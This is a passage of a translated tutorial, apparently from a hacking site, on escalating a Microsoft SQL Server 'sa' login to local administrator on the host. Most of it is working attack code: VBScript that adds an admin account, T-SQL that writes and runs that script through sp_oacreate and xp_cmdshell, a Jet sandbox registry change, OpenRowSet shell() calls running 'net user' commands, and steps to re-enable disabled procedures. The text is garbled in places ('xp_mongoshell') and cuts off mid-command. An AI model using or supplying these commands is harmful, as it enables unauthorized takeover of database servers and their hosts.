Latest Microsoft SQL Server sa permission intrusion method

Original article translated from: Simplified. We know that vbs has a winnt object in the Active Directory (ADSI) to manage local resources. You can add an administrator without using commands such as cmd.

The server administrator or the administrator cannot add an administrator account because net.exeand net1.exe are restricted. We know that vbs has a winnt object in the Active Directory (ADSI) to manage local resources. You can add an administrator without using commands such as cmd. The specific code is as follows:

 

Set wsnetwork = Createobject ("wscript. Network ") OS = "winnt: //" & wsnetwork. computername Set Ob = GetObject (OS) 'To Get The ADSI interface, bind Set OE = GetObject (OS & "/administrators, group") 'attribute, Admin group Set OD = OB. Create ("user", "test") 'creates a user OD. setpassword "1234" 'Set Password OD. setinfo' save Set of = GetObject (OS & "/test", user) 'to get the user Oe. Add OS & "/test"

Save the above Code as 1.vbsand run the command "cscript 1. vbs". In this way, a user named test and password 1234 will be added to the system. The Code executed in the query analyzer is as follows:

 

Declare @ o int, @ F int, @ t int, @ RET int Exec sp_oacreate 'scripting. FileSystemObject ', @ o out Exec sp_oamethod @ o, 'createtextfile', @ F out, 'c: \ 1. vbs ', 1 Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set wsnetwork = Createobject ("Wscript. Network ")' Exec @ ret = sp_oamethod @ F, 'writeline ', null,' OS = "winnt: //" & wsnetwork. Computername' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set Ob = GetObject (OS )' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set OE = GetObject (OS & "/administrators, group ")' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set OD = OB. Create ("User", "test ")' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'od. setpassword "1234 "' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'od. setinfo' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'set of = GetObject (OS & "/test", user )' Exec @ ret = sp_oamethod @ F, 'writeline ', null, 'oe. Add OS & "/test "'

After executing the preceding statement, execute the following line of code. This line of code must be executed independently. Do not run it together with the preceding statement. Otherwise, the prompt "C: \ 1. vbs is being run by another program, and users cannot be added successfully:

 

Exec master .. xp_mongoshell 'cscript c: \ 1. vbs'

If the system user is not added successfully, it may be because the System user's password 1234 is too simple and does not comply with the complex password policy of the server. You can consider the complexity of the settings and then test it. You can also use echo to write the code to 1. vbs. The code format is:

 

Exec master .. xp_mongoshell 'echo set wsnetwork = Createobject ("wscript. Network ") > 1. vbs'

However, I don't know why all command lines with "&" characters cannot write 1.vbs. if you are interested, try to solve it.

The jet sandbox mode solves the troubles caused by stored procedures such as xp_mongoshell and related dynamic link libraries. For security reasons, the sandbox mode is disabled by default. Therefore, xp_regwrite is required to enable the sandbox mode:

 

Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ Engines ', 'sandboxmode', 'reg _ dword', 1

Then run the sandbox command to add a user with the username test and password 1234 to the system:

 

Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = C: \ WINDOWS \ System32 \ IAS \ ias. mdb ', 'select shell ("cmd.exe/C net user test 1234/Add ")') Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = C: \ WINDOWS \ System32 \ IAS \ ias. mdb ', 'select shell ("cmd.exe/C net localgroup Administrators test/Add ")')

Different operating systems have different paths and must be modified as needed:

 

NT/2 K: C: \ winnt \ system32 \ XP/2003: c: \ windows \ system32 \

In addition, Microsoft SQL server2005 disables some stored procedures by default. You need to run the following command:

Enable xp_cmdshell:

 

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'Xp _ cmdshell', 1; reconfigure;

Enable 'openrowset ':

 

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'Ad hoc distributed queries ', 1; reconfigure;

Enable 'SP _ oacreate ':

 

Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp